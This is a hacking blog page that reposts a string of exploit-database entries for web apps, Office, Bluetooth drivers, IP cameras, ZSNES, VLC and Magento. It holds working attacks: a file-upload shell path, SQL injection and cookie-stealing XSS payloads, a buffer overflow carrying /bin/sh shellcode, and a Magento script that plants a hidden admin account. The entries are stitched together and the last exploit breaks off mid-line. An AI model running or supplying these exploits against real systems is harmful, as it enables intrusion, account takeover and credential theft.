Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863153518

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/56109/info

BSW Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

Code in uploadpic.php

print "<form method=\"POST\" action=\"dopic.php\"enctype=\"multipart/form-data\" style=\"width: 227px\">";
print "<table align=\"center\" style=\"width: 600px\"dir=\"ltr\"><tr><th align=\"right\"width=\"120\" class=\"topic\"><b>File Upload:</b></th>";
print "<th align=\"left\"><input type=\"file\" name=\"fileupload\"></th></tr>";
print "<tr><th><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"10240000\"></th></tr></table>";
print"<table align=\"center\"width=\"600\"dir=\"ltr\">";
print"<th class=\"topic\"width=\"120\"align=\"right\">Image Title</th><th align=\"left\"><input style=\"width:400\"type=\"text\" name=\"picture\" /></th></table>";
print"<table align=\"center\"dir=\"ltr\" width=\"600\"><th class=\"topic\" width=\"120\"align=\"right\">Image Description</th>";
print"<th align=\"left\"><textarea name=\"descrip\"cols=\"48\"rows=\"5\">&lt;/textarea&gt;</th></table>";

   Code in dopic.php

$fname=$_POST['picture'];
$descrip=$_POST['descrip'];
$file_dir ="gallery/";


foreach($_FILES as $file_name => $file_array) {
  echo "path: ".$file_array["tmp_name"]."<br/>\n";
  echo "name: ".$file_array["name"]."<br/>\n";
  echo "type: ".$file_array["type"]."<br/>\n";
  
  echo "size: ".$file_array["size"]."<br/>\n";

  if (is_uploaded_file($file_array["tmp_name"])) {
    move_uploaded_file($file_array["tmp_name"], "$file_dir/".$file_array["name"]) or die ("Couldn't copy");
    echo "Done!<br/>";
  }
   
}
$image=$file_dir.$file_array["name"];
$ip = getenv("REMOTE_ADDR");
$sql = "insert into gallery (picture,files,descrip,updated)values('$fname','$image','$descrip',now());";
mysql_query($sql,$mysql);
mysql_close($mysql);

------------------------------------------------------------------------------------
 Proof of Concept  :                                                                                                                              
 http://www.example.com/path_gallery/uploadpic.php                                                                                                         
 Shell :                                                                            
                                                                                    
 http://www.example.com/path_gallery/gallery/shell.php                                          
                                                                                    
 See for the demo :                                                                 
                                                                                    
 http://www.example.com/demo/demo1.png                                                    
 http://www.example.com/demo/demo2.png                                                    
 http://www.example.com/demo/demo3.png                                                    
                                  
            
source: https://www.securityfocus.com/bid/56110/info

Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.

Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/force-download.php?file=[RFD] 
            
source: https://www.securityfocus.com/bid/56110/info
 
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
 
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/plist.php?albumid=[SQLi] 
            
source: https://www.securityfocus.com/bid/56110/info
  
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
  
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/plist.php?albumid=[XSS] 
            
source: https://www.securityfocus.com/bid/56110/info
   
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
   
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi] 
            
/*
source: https://www.securityfocus.com/bid/56124/info

Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.

Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected. 
*/

HANDLE   hDevice;
    char *inbuff, *outbuff;
    DWORD ioctl, len,;
 
    if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
                                              0,
                                              0,
                                              0,
                                              OPEN_EXISTING,
                                              0,
                                              NULL) ) != INVALID_HANDLE_VALUE )
    {
            printf("Device succesfully opened!\n");
    }
    else
    {
            printf("Error: Error opening device \n");
            return 0;
    }
    inbuff = (char*)malloc(0x12000);
    if(!inbuff){
            printf("malloc failed!\n");
            return 0;
    }
    outbuff = (char*)malloc(0x12000);
    if(!outbuff){
            printf("malloc failed!\n");
            return 0;
    }
        ioctl = 0x2A04C0;
        memset(inbuff, 0x41, 0x70);    
        DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
            
# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...

Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)

You can change or view passwords

TEST: http://server:88/login.asp
-- 
RAT - ThiefKing
http://tromcap.com
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1

The following access violation was observed in Microsoft Office 2007
(Word document):

(e24.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
MSVCR80!memcpy+0x5a:
7814500a f3a5            rep  movsd ds:049860bc=???????? es:00122238=3348bcd8
0:000> k
ChildEBP RetAddr
001221e8 31249c0e MSVCR80!memcpy+0x5a
00122204 3126a371 wwlib!FMain+0x565f
00122220 3203de3c wwlib!FMain+0x25dc2
00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
00123b68 3129e8e5 wwlib!FMain+0x5af3c
00123bac 32073906 wwlib!FMain+0x5a336
00126d28 32073627 wwlib!DllGetClassObject+0x35644
0012b14c 32073294 wwlib!DllGetClassObject+0x35365
0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
0012f580 320e04b7 wwlib!FMain+0xd00d5
0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
0012f648 32812493 wwlib!DllGetClassObject+0xa20bd

Notes:

- Reproduces on Windows Server 2003 and Windows 7

- The crash occurs due to a memcpy with an invalid source buffer.

- The invalid source buffer is actually indicative of an invalid size
being used in a pointer calculation at 3126A360 (wwlib.dll
12.0.6707.5000). This invalid size can also be seen in ecx at the time
of access violation.

- The large size parameter can result in a stack-based buffer overflow.

- Alternatively, if the copy operation succeeds (by using a size value
large enough to result in an out-of-bounds source buffer, but not so
large to cause an access violation during copy), then it is also
possible to get an arbitrary free from later usage of controlled
pointers in the destination buffer.

- The crashing test case was created using a chunk reordering
strategy, and does not cleanly minimize (106 bit change from original
file).

- Attached files: 86ea4a3c_crash.rtf (crashing file),
86ea4a3c_orig.doc (original file)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37967.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1

The following access violation was observed in Microsoft Office 2007
(Word document):

(8c0.e68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mso!Ordinal7799+0x2fc:
32881800 0fb74614         movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d038 328a0a4e mso!Ordinal7799+0x2fc
0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
0012dde4 320c337c mso!Ordinal4388+0x19a
0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
0012de74 312db32b wwlib!DllGetClassObject+0x8504d
0012df1c 312dadf8 wwlib!FMain+0x96d7c
0012df84 312da84c wwlib!FMain+0x96849
0012e074 6be51b27 wwlib!FMain+0x9629d
0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209

Notes:

- Reproduce on Windows Server 2003 and Windows 7.

- The crash occurs due to an invalid read dereference of a bad object
pointer. If the word value read is controlled and set to a value other
than 0xFFFF, then a controlled value is used as an indirect call
target (at 328A1DD4 in MSO.dll 12.0.6683.5000).

- The bad object pointer is passed in to MSO.dll from wwlib.dll
(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).

- The test-case reduces to a 50-bit difference from the original
sample document.

- The affected bits lie in the OneTableDocumentStream's data section,
as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.

- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
source buffer from the OneTableDocumentStream's data section, and
copies this invalid data into a stack buffer. The bad object pointer
comes from this stack-based structure.

- Attached files: 037542f7_crash.rtf (crashing file),
037542f7_orig.doc (original file). A test case with full control of
the crashing register value (0xAAAAAAAA) is also attached
(037542f7_full.doc)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37966.zip
            
source: https://www.securityfocus.com/bid/56148/info

CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

CMS Mini 0.2.2 is vulnerable; other versions may also be affected. 

http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent 
            
source: https://www.securityfocus.com/bid/56156/info

FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable. 

http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker 
            
source: https://www.securityfocus.com/bid/56159/info

The Wordfence Security plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Wordfence Security 3.3.5 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email" 
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>
            
source: https://www.securityfocus.com/bid/56173/info

WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WHMCS 4.5.2 is vulnerable; other versions may also be affected. 

#Proof of Concept : 

<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
    var http = new XMLHttpRequest();
 try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
    } catch (e) {
        alert("Permission UniversalBrowserRead denied.");
    }
    http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
    http.onreadystatechange = handleResponse;
    http.send(params);
function handleResponse() {

  if(http.readyState == 4 && http.status == 200){
    var response = http.responseText;
alert(response);
    }
  }  
</script>
</body>
</html>
            
source: https://www.securityfocus.com/bid/56223/info

SMF is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SMF 2.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/ssi_examples.php?view=[Xss] 
            
source: https://www.securityfocus.com/bid/56293/info

Inventory is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Inventory 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://www.example.com/inventory/addinventario.php?ref=555-555-0199@example.com'AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555- 0199@example.com' AND SLEEP(5) AND 'IgkP'='IgkP&factura=555-555-0199@example.com' AND SLEEP(5) AND 'CFdY'='CFdY
http://www.example.com/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
http://www.example.com/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://www.example.com/inventory/newinventario.php?sn=<script>alert(100)</script>
http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script> 
            
# Exploit Author: Juan Sacco - http://www.exploitpack.comp <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali Linux 2.0
# Description: ZSNES v1.51 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.zsnes.com
# Kali Linux 2.0 package: 1.510+bz2-8 (/var/lib/apt/lists/http.kali.org_kali_dists_sana_main_binary-i386_Packages)
# MD5: 23c1e4d12b6b8895961a29f2fd91570b

def run():
  try:
    print "# ZSNES v1.51 Stack-BoF by Juan Sacco"
    print "# Wasting CPU clocks on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Basic structure: JUNK + SHELLCODE + NOPS + EIP
    junk = "\x41"*8
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*589
    eip = "\x10\xf0\xff\xbf"

    subprocess.call(["zsnes", junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "ZSNES not found!"
    else:
    print "Error executing exploit"
    raise

def howtousage():
  print "Sorry, something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"
  except IndexError:
    howtousage()
run()
            
#!/usr/bin/python

#

# VLC media player 2.2.1 m3u8/m3u Crash Proof Of Concept

#

# Author: Naser Farhadi

#

# Date: 25 August 2015 # Version: 2.2.1 # Tested on: Windows 7 SP1 (32 bit)

#

##



"""

ModLoad: 71ae0000 71b64000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll

httplive stream: HTTP Live Streaming (/C:/Users/test/Desktop/crash.m3u8)

ModLoad: 6c610000 6c622000   C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll

(e38.554): Stack overflow - code c00000fd (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000000 ebx=04234238 ecx=04234138 edx=6ef83100 esi=6ef83124 edi=00000000

eip=7541694b esp=04233000 ebp=06e6b4ac iopl=0         nv up ei pl zr na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

KERNELBASE!FlsGetValue+0x2:

7541694b 55              push    ebp

"""



filename = "crash.m3u8" # Or .m3u

buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"

          "\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"

          "\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"

          "\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"

          "\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"

          "\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"

          "\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"

          "\x32\x30\x78\x33\x36\x30\r\n")

buffer += filename

open(filename, "wb").write(buffer)
            
##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author        : Manish Kishan Tanwar AKA error1046
#Date          : 25/08/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At  : Indishell Lab(originally developed by joren)
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/)
This python script developed by joren but it was having some bug because of which it was not working properly.
If magento version is vulnerable, this script will create admin account with username forme and password forme

 

////////////////
///  POC   ////
///////////////
Exploit script starts here
///////////////////
#Thanks to
# Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON  
import requests
import base64
import sys

target = "http://target.com/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"





/////////////////
exploit code ends here




                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
            
source: https://www.securityfocus.com/bid/56299/info

Gramophone is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Gramophone 0.01b1 is vulnerable; other versions may also be affected. 

http://www.example.com/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E 
            
source: https://www.securityfocus.com/bid/56307/info

VicBlog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/domain.tld/index.php?page=posts${tag or upated_max paramater}=1[SQLi] 
            
source: https://www.securityfocus.com/bid/56309/info

Microsoft Office is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application. Due to the nature of the issue code execution might be possible, but it has not been confirmed.

Microsoft Office 2007 is affected; other versions may also be vulnerable. 

#!/usr/bin/perl
 
# Microsoft Office Excel ReadAV Arbitrary Code Execution
 
# Author: Jean Pascal Pereira <pereira@secbiz.de>
 
# Vendor URI: http://office.microsoft.com
 
# Vendor Description:
# Microsoft Excel is a commercial spreadsheet application written and distributed by Microsoft for Microsoft Windows and Mac OS X.
# It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.

# Affected versions:
# Microsoft Office 2007 (confirmed)
# Microsoft Excel Reader 12 (confirmed)
# Microsoft Office 2010 (not confirmed yet)

# Debug Info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#  
# CommandLine: "C:\Program Files\Microsoft Office\Office12\XLVIEW.EXE" C:\research\MSExcel\crafted.xls
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path.           *
# * Use .symfix to have the debugger choose a symbol path.                   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is: 
# ModLoad: 30000000 30cd8000   Excel.exe
# ModLoad: 7c900000 7c9b2000   ntdll.dll
# ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 78130000 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\MSVCR80.dll
# ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
# ModLoad: 3a9d0000 3b754000   C:\Program Files\Microsoft Office\Office12\oart.dll
# ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
# (9c.380): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 32600000 3361f000   C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
# ModLoad: 7d1e0000 7d49c000   C:\WINDOWS\system32\msi.dll
# ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\Comctl32.dll
# ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 01080000 016d4000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
# ModLoad: 016e0000 020bd000   C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
# ModLoad: 3bd10000 3bea4000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
# ModLoad: 76f50000 76f58000   C:\WINDOWS\system32\WTSAPI32.DLL
# ModLoad: 76360000 76370000   C:\WINDOWS\system32\WINSTA.dll
# ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
# ModLoad: 79000000 7904a000   C:\WINDOWS\system32\mscoree.dll
# ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.DLL
# ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.DLL
# ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\comctl32.dll
# ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
# ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
# ModLoad: 02450000 02715000   C:\WINDOWS\system32\xpsp2res.dll
# ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
# ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.DLL
# ModLoad: 3a780000 3a889000   C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
# (9c.380): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130
# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe - 
# Excel!Ordinal40+0x25c1fc:
# 3025c1fc 668b0f          mov     cx,word ptr [edi]        ds:0023:00000130=????
# 0:000> r;!exploitable -v;q
# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130
# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# Excel!Ordinal40+0x25c1fc:
# 3025c1fc 668b0f          mov     cx,word ptr [edi]        ds:0023:00000130=????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - 
# Exception Faulting Address: 0x130
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Proof of Concept:

my $crafted =

